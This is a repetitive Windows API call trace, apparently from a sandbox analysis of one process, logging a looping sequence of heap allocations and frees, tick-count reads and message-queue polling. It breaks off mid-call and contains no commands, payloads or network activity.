0 [0066.430] GetTickCount () returned 0x1d22c [0066.430] GetTickCount () returned 0x1d22c [0066.430] CoFreeUnusedLibraries () [0066.430] GetTickCount () returned 0x1d22c [0066.430] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.430] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.430] GetTickCount () returned 0x1d22c [0066.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.431] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.431] GetTickCount () returned 0x1d22c [0066.431] GetTickCount () returned 0x1d22c [0066.431] CoFreeUnusedLibraries () [0066.431] GetTickCount () returned 0x1d22c [0066.431] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.431] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.431] GetTickCount () returned 0x1d22c [0066.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.431] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.431] GetTickCount () returned 0x1d22c [0066.431] GetTickCount () returned 0x1d22c [0066.431] CoFreeUnusedLibraries () [0066.431] GetTickCount () returned 0x1d22c [0066.431] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.431] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.431] GetTickCount () returned 0x1d22c [0066.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.431] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.431] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.431] GetTickCount () returned 0x1d22c [0066.431] GetTickCount () returned 0x1d22c [0066.432] CoFreeUnusedLibraries () [0066.432] GetTickCount () returned 0x1d22c [0066.432] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.432] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.432] GetTickCount () returned 0x1d22c [0066.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.432] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.432] GetTickCount () returned 0x1d22c [0066.432] GetTickCount () returned 0x1d22c [0066.432] CoFreeUnusedLibraries () [0066.432] GetTickCount () returned 0x1d22c [0066.432] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.432] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.432] GetTickCount () returned 0x1d22c [0066.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.432] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.432] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.432] GetTickCount () returned 0x1d22c [0066.432] GetTickCount () returned 0x1d22c [0066.432] CoFreeUnusedLibraries () [0066.432] GetTickCount () returned 0x1d22c [0066.432] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.432] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.432] GetTickCount () returned 0x1d22c [0066.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.433] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.433] GetTickCount () returned 0x1d22c [0066.433] GetTickCount () returned 0x1d22c [0066.433] CoFreeUnusedLibraries () [0066.433] GetTickCount () returned 0x1d22c [0066.433] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.433] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.433] GetTickCount () returned 0x1d22c [0066.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.433] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.433] GetTickCount () returned 0x1d22c [0066.433] GetTickCount () returned 0x1d22c [0066.433] CoFreeUnusedLibraries () [0066.433] GetTickCount () returned 0x1d22c [0066.433] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.433] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.433] GetTickCount () returned 0x1d22c [0066.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.433] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.434] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.434] GetTickCount () returned 0x1d22c [0066.434] GetTickCount () returned 0x1d22c [0066.434] CoFreeUnusedLibraries () [0066.434] GetTickCount () returned 0x1d22c [0066.434] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.434] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.434] GetTickCount () returned 0x1d22c [0066.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.434] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.434] GetTickCount () returned 0x1d22c [0066.434] GetTickCount () returned 0x1d22c [0066.434] CoFreeUnusedLibraries () [0066.434] GetTickCount () returned 0x1d22c [0066.434] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.434] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.434] GetTickCount () returned 0x1d22c [0066.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.434] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.434] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.434] GetTickCount () returned 0x1d22c [0066.434] GetTickCount () returned 0x1d22c [0066.434] CoFreeUnusedLibraries () [0066.434] GetTickCount () returned 0x1d22c [0066.435] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.435] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.435] GetTickCount () returned 0x1d22c [0066.435] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.435] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.435] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.435] GetTickCount () returned 0x1d22c [0066.435] GetTickCount () returned 0x1d22c [0066.435] CoFreeUnusedLibraries () [0066.435] GetTickCount () returned 0x1d22c [0066.435] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.435] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.435] GetTickCount () returned 0x1d22c [0066.435] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.435] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.435] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.435] GetTickCount () returned 0x1d22c [0066.435] GetTickCount () returned 0x1d22c [0066.435] CoFreeUnusedLibraries () [0066.435] GetTickCount () returned 0x1d22c [0066.435] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.435] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.435] GetTickCount () returned 0x1d22c [0066.436] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.436] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.436] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.436] GetTickCount () returned 0x1d22c [0066.436] GetTickCount () returned 0x1d22c [0066.436] CoFreeUnusedLibraries () [0066.436] GetTickCount () returned 0x1d22c [0066.436] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.436] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.436] GetTickCount () returned 0x1d22c [0066.436] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.436] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.436] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.436] GetTickCount () returned 0x1d22c [0066.436] GetTickCount () returned 0x1d22c [0066.436] CoFreeUnusedLibraries () [0066.436] GetTickCount () returned 0x1d22c [0066.436] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.436] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.436] GetTickCount () returned 0x1d22c [0066.436] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.436] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.436] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.436] GetTickCount () returned 0x1d22c [0066.437] GetTickCount () returned 0x1d22c [0066.437] CoFreeUnusedLibraries () [0066.437] GetTickCount () returned 0x1d22c [0066.437] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.437] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.437] GetTickCount () returned 0x1d22c [0066.437] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.437] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.437] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.437] GetTickCount () returned 0x1d22c [0066.437] GetTickCount () returned 0x1d22c [0066.437] CoFreeUnusedLibraries () [0066.437] GetTickCount () returned 0x1d22c [0066.437] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.437] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.437] GetTickCount () returned 0x1d22c [0066.437] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.437] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.437] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.437] GetTickCount () returned 0x1d22c [0066.437] GetTickCount () returned 0x1d22c [0066.438] CoFreeUnusedLibraries () [0066.438] GetTickCount () returned 0x1d22c [0066.438] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.438] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.438] GetTickCount () returned 0x1d22c [0066.438] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.438] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.438] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.438] GetTickCount () returned 0x1d22c [0066.438] GetTickCount () returned 0x1d22c [0066.438] CoFreeUnusedLibraries () [0066.438] GetTickCount () returned 0x1d22c [0066.438] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.438] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.438] GetTickCount () returned 0x1d22c [0066.438] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.438] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.439] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.439] GetTickCount () returned 0x1d23c [0066.439] GetTickCount () returned 0x1d23c [0066.439] CoFreeUnusedLibraries () [0066.439] GetTickCount () returned 0x1d23c [0066.439] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.439] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.439] GetTickCount () returned 0x1d23c [0066.439] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.439] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.439] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.439] GetTickCount () returned 0x1d23c [0066.439] GetTickCount () returned 0x1d23c [0066.439] CoFreeUnusedLibraries () [0066.439] GetTickCount () returned 0x1d23c [0066.439] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.439] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.440] GetTickCount () returned 0x1d23c [0066.440] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.440] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.440] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.440] GetTickCount () returned 0x1d23c [0066.440] GetTickCount () returned 0x1d23c [0066.440] CoFreeUnusedLibraries () [0066.440] GetTickCount () returned 0x1d23c [0066.440] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.440] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.440] GetTickCount () returned 0x1d23c [0066.440] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.440] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.440] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.440] GetTickCount () returned 0x1d23c [0066.440] GetTickCount () returned 0x1d23c [0066.440] CoFreeUnusedLibraries () [0066.440] GetTickCount () returned 0x1d23c [0066.440] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.440] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.441] GetTickCount () returned 0x1d23c [0066.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.441] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.441] GetTickCount () returned 0x1d23c [0066.441] GetTickCount () returned 0x1d23c [0066.441] CoFreeUnusedLibraries () [0066.441] GetTickCount () returned 0x1d23c [0066.441] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.441] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.441] GetTickCount () returned 0x1d23c [0066.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.441] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.441] GetTickCount () returned 0x1d23c [0066.441] GetTickCount () returned 0x1d23c [0066.441] CoFreeUnusedLibraries () [0066.441] GetTickCount () returned 0x1d23c [0066.441] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.441] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.441] GetTickCount () returned 0x1d23c [0066.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.441] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.442] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.442] GetTickCount () returned 0x1d23c [0066.442] GetTickCount () returned 0x1d23c [0066.442] CoFreeUnusedLibraries () [0066.442] GetTickCount () returned 0x1d23c [0066.442] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.442] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.442] GetTickCount () returned 0x1d23c [0066.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.442] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.442] GetTickCount () returned 0x1d23c [0066.442] GetTickCount () returned 0x1d23c [0066.442] CoFreeUnusedLibraries () [0066.442] GetTickCount () returned 0x1d23c [0066.442] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.442] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.442] GetTickCount () returned 0x1d23c [0066.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.442] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.442] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.442] GetTickCount () returned 0x1d23c [0066.442] GetTickCount () returned 0x1d23c [0066.442] CoFreeUnusedLibraries () [0066.442] GetTickCount () returned 0x1d23c [0066.442] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.442] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.442] GetTickCount () returned 0x1d23c [0066.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.443] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.443] GetTickCount () returned 0x1d23c [0066.443] GetTickCount () returned 0x1d23c [0066.443] CoFreeUnusedLibraries () [0066.443] GetTickCount () returned 0x1d23c [0066.443] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.443] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.443] GetTickCount () returned 0x1d23c [0066.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.443] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.443] GetTickCount () returned 0x1d23c [0066.443] GetTickCount () returned 0x1d23c [0066.443] CoFreeUnusedLibraries () [0066.443] GetTickCount () returned 0x1d23c [0066.443] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.443] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.443] GetTickCount () returned 0x1d23c [0066.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.443] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.443] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.444] GetTickCount () returned 0x1d23c [0066.444] GetTickCount () returned 0x1d23c [0066.444] CoFreeUnusedLibraries () [0066.444] GetTickCount () returned 0x1d23c [0066.444] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.444] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.444] GetTickCount () returned 0x1d23c [0066.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.444] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.444] GetTickCount () returned 0x1d23c [0066.444] GetTickCount () returned 0x1d23c [0066.444] CoFreeUnusedLibraries () [0066.444] GetTickCount () returned 0x1d23c [0066.444] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.444] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.444] GetTickCount () returned 0x1d23c [0066.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.444] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.444] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.444] GetTickCount () returned 0x1d23c [0066.444] GetTickCount () returned 0x1d23c [0066.444] CoFreeUnusedLibraries () [0066.444] GetTickCount () returned 0x1d23c [0066.444] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.444] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.444] GetTickCount () returned 0x1d23c [0066.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.445] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.445] GetTickCount () returned 0x1d23c [0066.445] GetTickCount () returned 0x1d23c [0066.445] CoFreeUnusedLibraries () [0066.445] GetTickCount () returned 0x1d23c [0066.445] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.445] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.445] GetTickCount () returned 0x1d23c [0066.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, 